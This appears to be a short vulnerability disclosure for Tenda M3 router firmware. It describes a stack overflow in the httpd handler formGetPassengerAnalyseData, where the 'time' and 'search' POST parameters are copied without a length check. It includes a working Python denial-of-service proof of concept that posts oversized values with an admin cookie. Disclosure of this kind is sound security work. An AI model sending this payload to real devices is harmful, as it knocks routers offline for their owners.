- The device's official website: https://www.tenda.com.cn/product/M3.html
- Firmware download website: https://www.tenda.com.cn/download/detail-3133.html
V1.0.0.12(4856)
httpd in directory /bin has a stack overflow vulnerability. The vulnerability occurrs in the formGetPassengerAnalyseData function, which can be accessed via the URL goform/getPassengerAnalyseData
formGetPassengerAnalyseData function gets the POST parameter time and searchand copies to stack buffer without checking its length, causing a stack overflow vulnerability.
Poc of Denial of Service(DoS)
import requests
data = {
b"time": b'A'*0x400,
b"search": b'A'*0x400
}
cookies = {
b"user": "admin"
}
res = requests.post("http://127.0.0.1/goform/getPassengerAnalyseData", data=data, cookies=cookies)
print(res.content)
